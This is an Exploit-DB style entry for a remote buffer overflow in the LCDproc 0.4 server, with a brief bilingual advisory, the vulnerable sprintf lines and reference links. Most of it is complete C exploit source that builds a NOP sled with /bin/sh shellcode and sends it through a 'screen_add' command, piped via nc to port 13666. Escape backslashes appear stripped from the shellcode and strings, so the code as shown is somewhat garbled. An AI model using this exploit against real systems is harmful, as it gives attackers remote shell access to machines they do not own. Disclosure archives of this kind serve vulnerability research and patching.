https://www.exploit-db.com/exploits/19868
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200004-059

LCDproc中存在缓冲区溢出漏洞，远程攻击者可以通过screen_add命令获取根用户权限。

source: http://www.securityfocus.com/bid/1131/info

A vulnerability exists in the server portion of version 0.4 of the LCDProc package. Several remote buffer overflows exist that could allow a remote attacker to corrupt memory and execute arbitrary code. As listed in the Bugtraq posting revealing this vulnerability, overflows exist at:

parse.c:149: sprintf(errmsg, "huh? Invalid command "%s"n", argv[0]);
screenlist.c:119: sprintf(str, "ignore %sn", old_s->id);
screenlist.c:134: sprintf(str, "listen %sn", s->id);

It is possible to exploit this conditions to execute code with the privileges of the user LCDProc is running as.

/*****
 * lcdproc-exploit.c
 *****
 *
 * LCDproc 0.4-pre9 exploit
 # 
 # Andrew Hobgood <[email protected]>
 * Kha0S on #LinuxOS/EFnet
 * 
 * Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands
 * on for testing).
 * 
 *****
 */
   
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFFERSIZE 269
#define NOP 0x90
#define OFFSET 0xbffff750
 
char shellcode[] =
        "xebx1fx5ex89x76x08x31xc0x88x46x07x89"
        "x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c"
        "xcdx80x31xdbx89xd8x40xcdx80xe8xdcxff"
        "xffxff/bin/sh";
   
int main(int argc, char **argv) {
        char *ptr, buffer[BUFFERSIZE];
        unsigned long *long_ptr, offset = OFFSET;
        int aux;
   
        fprintf(stderr, "LCDproc exploit by Andrew Hobgood <[email protected]>nn");
        fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target> 13666nn", argv[0]);

        if (argc == 2) offset += atol(argv[1]);

        ptr = buffer;
        memset(ptr, 0, sizeof(buffer));
        memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16);
        ptr += sizeof(buffer) - strlen(shellcode) - 16;
        memcpy(ptr, shellcode, strlen(shellcode));
        ptr += strlen(shellcode);
        long_ptr = (unsigned long *) ptr;
        for(aux=0; aux<4; aux++) *(long_ptr++) = offset;  
        ptr = (char *) long_ptr;
        *ptr = '';
   
        fprintf(stderr, "Buffer size: %dn", (int) strlen(buffer));
        fprintf(stderr, "Offset: 0x%lxnn", offset);
        
        printf("hellon");
        fflush(stdout);
        sleep(1);
        printf("screen_add {%s}n", buffer);
        fflush(stdout);
        
        return(0);
}       
/*** end lcdproc-exploit.c ***/

来源:BUGTRAQ
名称:20000420RemotevulnerabilityinLCDproc0.4
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:1131
链接:http://www.securityfocus.com/bid/1131
来源:XF
名称:lcdproc-remote-overflow(4315)
链接:http://xforce.iss.net/xforce/xfdb/4315
来源:GENTOO
名称:GLSA-200301-07
链接:http://www.securityfocus.com/archive/1/archive/1/305589/30/26390/threaded
来源:SECUNIA
名称:7829
链接:http://secunia.com/advisories/7829